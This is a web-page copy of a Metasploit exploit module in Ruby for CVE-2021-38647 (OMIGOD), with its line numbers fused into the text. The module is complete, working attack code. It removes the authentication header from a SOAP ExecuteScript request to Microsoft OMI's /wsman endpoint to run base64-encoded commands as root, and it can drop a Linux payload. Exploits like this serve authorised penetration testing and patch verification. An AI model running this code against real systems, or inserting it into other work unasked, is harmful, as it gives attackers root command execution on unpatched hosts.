CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = ExcellentRanking89prepend Msf::Exploit::Remote::AutoCheck10include Msf::Exploit::Remote::HttpClient11include Msf::Exploit::CmdStager1213XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'Microsoft OMI Management Interface Authentication Bypass',20'Description' => %q{21By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint22that will cause it to execute an operating system command as the root user. This vulnerability was patched in23OMI version 1.6.8-1 (released September 8th 2021).24},25'Author' => [26'Nir Ohfeld', # vulnerability discovery & research27'Shir Tamari', # vulnerability discovery & research28'Spencer McIntyre', # metasploit module29'wvu' # vulnerability research30],31'References' => [32['CVE', '2021-38647'],33['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'],34['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],35['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'],36['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']37],38'DisclosureDate' => '2021-09-14',39'License' => MSF_LICENSE,40'Platform' => ['linux', 'unix'],41'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],42'Privileged' => true,43'Targets' => [44[45'Unix Command',46{47'Platform' => 'unix',48'Arch' => ARCH_CMD,49'Type' => :unix_cmd50}51],52[53'Linux Dropper',54{55'Platform' => 'linux',56'Arch' => [ARCH_X86, ARCH_X64],57'Type' => :linux_dropper58}59]60],61'DefaultTarget' => 1,62'DefaultOptions' => {63'RPORT' => 5985,64'SSL' => false,65'MeterpreterTryToFork' => true66},67'Notes' => {68'AKA' => ['OMIGOD'],69'Stability' => [CRASH_SAFE],70'Reliability' => [REPEATABLE_SESSION],71'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]72}73)74)7576register_options([77OptString.new('TARGETURI', [true, 'Base path', '/wsman'])78])79end8081def check82http_res = send_command('id')83return CheckCode::Unknown if http_res.nil?84return CheckCode::Safe unless http_res.code == 2008586cmd_res = parse_response(http_res)87return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\d+)\(\S+\) /8889return CheckCode::Vulnerable("Command executed as uid #{Regexp.last_match(1)}.")90end9192def exploit93print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")9495case target['Type']96when :unix_cmd97result = execute_command(payload.encoded)98if result99print_status(result[:stdout]) unless result[:stdout].blank?100print_error(result[:stderr]) unless result[:stderr].blank?101end102when :linux_dropper103execute_cmdstager104end105end106107def execute_command(cmd, _opts = {})108vprint_status("Executing command: #{cmd}")109res = send_command(cmd)110111unless res && res.code == 200112fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")113end114115parse_response(res)116end117118def parse_response(res)119return nil unless res&.code == 200120121return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i122unless return_code == 0123print_error("Failed to execute command: #{cmd} (status: #{return_code})")124end125126{127return_code: return_code,128stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,129stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content130}131end132133def send_command(cmd)134send_request_cgi(135'method' => 'POST',136'uri' => normalize_uri(target_uri.path),137'ctype' => 'text/xml;charset=UTF-8',138'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)139<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">140<s:Header>141<a:To>HTTP://127.0.0.1:5985/wsman/</a:To>142<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>143<a:ReplyTo>144<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>145</a:ReplyTo>146<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>147<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>148<a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>149<w:OperationTimeout>PT1M30S</w:OperationTimeout>150<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>151<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>152<w:OptionSet s:mustUnderstand="true"/>153<w:SelectorSet>154<w:Selector Name="__cimnamespace">root/scx</w:Selector>155</w:SelectorSet>156</s:Header>157<s:Body>158<p:ExecuteScript_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">159<p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script>160<p:Arguments/>161<p:timeout>0</p:timeout>162<p:b64encoded>true</p:b64encoded>163</p:ExecuteScript_INPUT>164</s:Body>165</s:Envelope>166ENVELOPE167)168end169end170171172